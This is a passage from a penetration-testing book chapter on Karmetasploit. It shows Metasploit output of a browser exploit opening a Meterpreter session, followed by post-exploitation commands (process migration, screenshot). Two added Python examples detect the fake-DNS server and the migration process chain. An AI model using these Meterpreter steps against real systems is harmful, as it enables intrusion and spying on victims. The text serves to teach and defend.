184

Chapter 12

[*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)

In this output, you can see at   that Metasploit first lets the client know that various popular websites are in fact located on the attacking machine. Then, at  , it uses JavaScript to determine the target’s operating system and browser, and responds at   with exploits based on that fingerprint. At   the client is presented with a malicious ActiveX control, resulting in the familiar yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You can also see buried in the output at   that an exploit was launched against the client. After a brief period, you see at   that the exploit was successful and a Meterpreter session has been opened on the target PC!
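The first step described above, every popular hostname answering with the attacker's own address, is also the easiest part of the attack to notice from the client side. The following is an added example (not code from the book or from Metasploit) of a client-side sanity check: it resolves a handful of canary hostnames that legitimately never share an A record and flags the case where most of them come back as one address, with extra weight when that address is private, as it is with the 10.0.0.1 attacker seen in the session output. The canary list, field names and the sample answers are this example's own constructions.

```python
"""Added example (not from the book): spot a Karma-style fake DNS server.

Karmetasploit answers every DNS query with the attacking machine's address,
so from the client's point of view many unrelated popular hostnames suddenly
resolve to one IP, usually a private (RFC 1918) one. The resolver is passed
in as a callable so the constructed samples below run offline.
"""
import ipaddress
import socket
from collections import Counter
from typing import Callable, Dict, Iterable

# Hostnames that, legitimately, never share a single A record (chosen here
# for illustration; any set of unrelated public sites works).
CANARY_HOSTS = [
    "www.google.com",
    "www.microsoft.com",
    "www.facebook.com",
    "www.yahoo.com",
    "www.bing.com",
]

Resolver = Callable[[str], str]


def classify_resolutions(answers: Dict[str, str], threshold: float = 0.6) -> dict:
    """Judge a mapping hostname -> IPv4 address.

    Suspicious when one address accounts for at least `threshold` of all
    answers; the verdict notes when that address is private, because public
    sites never resolve into RFC 1918 space on a healthy network.
    """
    if not answers:
        return {"suspicious": False, "shared_ip": None, "share": 0.0,
                "private": False, "reason": "no answers"}
    counts = Counter(answers.values())
    top_ip, top_n = counts.most_common(1)[0]
    share = top_n / len(answers)
    is_private = ipaddress.ip_address(top_ip).is_private
    suspicious = share >= threshold
    if suspicious:
        reason = f"{top_n}/{len(answers)} canary hosts resolve to {top_ip}"
        if is_private:
            reason += " (private address: consistent with a fake DNS server on the AP)"
    else:
        reason = "canary hosts resolve to distinct addresses"
    return {"suspicious": suspicious, "shared_ip": top_ip if suspicious else None,
            "share": share, "private": is_private, "reason": reason}


def check_network(resolve: Resolver, hosts: Iterable[str] = CANARY_HOSTS) -> dict:
    """Resolve each canary host with `resolve` and classify the answers."""
    answers = {}
    for host in hosts:
        try:
            answers[host] = resolve(host)
        except OSError:
            continue  # an unresolvable name is simply skipped
    return classify_resolutions(answers)


def live_resolver(host: str) -> str:
    """Real resolver for use on an actual network (the samples below don't use it)."""
    return socket.gethostbyname(host)


# --- constructed sample data (not real resolutions) -----------------------
# What a client on a Karmetasploit AP sees: every name answers with the
# attacker's address, 10.0.0.1 as in the session output above.
FAKE_DNS_ANSWERS = {h: "10.0.0.1" for h in CANARY_HOSTS}

# What a healthy resolver returns: distinct public addresses (values invented).
HEALTHY_ANSWERS = {
    "www.google.com": "142.250.1.1",
    "www.microsoft.com": "20.70.1.1",
    "www.facebook.com": "157.240.1.1",
    "www.yahoo.com": "98.137.1.1",
    "www.bing.com": "204.79.1.1",
}

if __name__ == "__main__":
    print(check_network(FAKE_DNS_ANSWERS.__getitem__))   # suspicious, private
    print(check_network(HEALTHY_ANSWERS.__getitem__))    # not suspicious
```

On a real network call `check_network(live_resolver)`; the threshold is deliberately below 1.0 so that one canary cached from an earlier, honest resolver does not mask the pattern.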

Returning to msfconsole, we can interact with the session that was created and check to see what permissions we have obtained on the target. Remember, when you exploit a browser it’s always a good idea to migrate your process out of the web browser in case it gets closed.

meterpreter > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: V-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > getuid
Server username: V-XP-SP2-BARE\Administrator
meterpreter > run migrate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232)
meterpreter > screenshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg
meterpreter >

Because this is a default installation of Windows XP SP2 with the very insecure Internet Explorer 6 installed (both of which are highly out of date), the client didn’t even need to accept and install the malicious ActiveX control.
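The session above also shows what the attack leaves behind on the victim: the browser starts a randomly named executable, and `run migrate -f` makes that executable spawn notepad.exe and move into it. As an added example (not from the book or from Metasploit), here is that chain written as detection logic over process-creation telemetry. The record layout and field names are this example's own, not the schema of Sysmon or any other product, and the events are constructed to mirror the PIDs and the process name printed in the session output.

```python
"""Added example (not from the book): flag a browser -> random-named EXE ->
notepad.exe process chain, which is what the Meterpreter session above
produces when `run migrate -f` is used after a browser exploit.

Stage 1: a browser launches an EXE with a random-looking name from a
user-writable directory. Stage 2: that same EXE (matched by PID) launches
notepad.exe, the default host process chosen by the migrate script.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
USER_WRITABLE = re.compile(r"(?i)\\(temp|temporary internet files|downloads|appdata)\\")
# Crude heuristic: 12+ letters, mixed case, no digits or dots before ".exe",
# which is the shape of jEFiwxBKyjoHGijtP.exe above. Tune for your estate.
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{12,}\.exe$")


@dataclass
class ProcessEvent:
    """One process-creation record (field names are this example's own)."""
    pid: int
    image: str          # full path of the new process
    parent_pid: int
    parent_image: str   # full path of the creating process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def looks_random(name: str) -> bool:
    return bool(RANDOM_NAME.match(name))


def find_migration_chains(events: List[ProcessEvent]) -> List[dict]:
    """Return one finding per browser -> dropper -> notepad.exe chain."""
    droppers: Dict[int, ProcessEvent] = {
        e.pid: e for e in events
        if basename(e.parent_image).lower() in BROWSERS
        and looks_random(basename(e.image))
        and USER_WRITABLE.search(e.image)
    }
    findings = []
    for e in events:
        if e.parent_pid in droppers and basename(e.image).lower() == "notepad.exe":
            d = droppers[e.parent_pid]
            findings.append({
                "browser": basename(d.parent_image),
                "dropper": basename(d.image),
                "dropper_pid": d.pid,
                "host_process_pid": e.pid,
                "severity": "high",
            })
    return findings


# --- constructed telemetry, modelled on the PIDs in the session output -----
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
DROPPER = r"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jEFiwxBKyjoHGijtP.exe"
NOTEPAD = r"C:\WINDOWS\system32\notepad.exe"
EXPLORER = r"C:\WINDOWS\explorer.exe"

SAMPLE_EVENTS = [
    ProcessEvent(1200, IE, 900, EXPLORER),        # user opens the browser
    ProcessEvent(3448, DROPPER, 1200, IE),        # browser exploit drops the EXE
    ProcessEvent(2232, NOTEPAD, 3448, DROPPER),   # run migrate -f spawns notepad
    ProcessEvent(2500, NOTEPAD, 900, EXPLORER),   # benign: Notepad from Explorer
]

if __name__ == "__main__":
    for f in find_migration_chains(SAMPLE_EVENTS):
        print(f)   # one finding: iexplore.exe -> jEFiwxBKyjoHGijtP.exe -> notepad.exe
```

The benign Explorer-launched Notepad in the sample is there to show that the rule keys on the parent chain, not on notepad.exe itself; in practice you would pair this with telemetry on cross-process memory writes, since migration is an injection into the new host, not a normal spawn.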

Wrapping Up

Attacks against wireless networks have been a popular topic for quite some time. Although this attack can take a bit of setup, imagine its success against a number of similarly configured clients located in a high-traffic or public area. This approach to attacking wireless clients is often popular because it’s easier than a brute force attack against a well-secured wireless infrastructure.

Now that you’ve seen how easy it is to conduct this sort of attack, you’ll probably think twice about using public wireless networks. Are you sure that the coffee shop is offering “free public Wi-Fi”? Or perhaps someone is running Karmetasploit?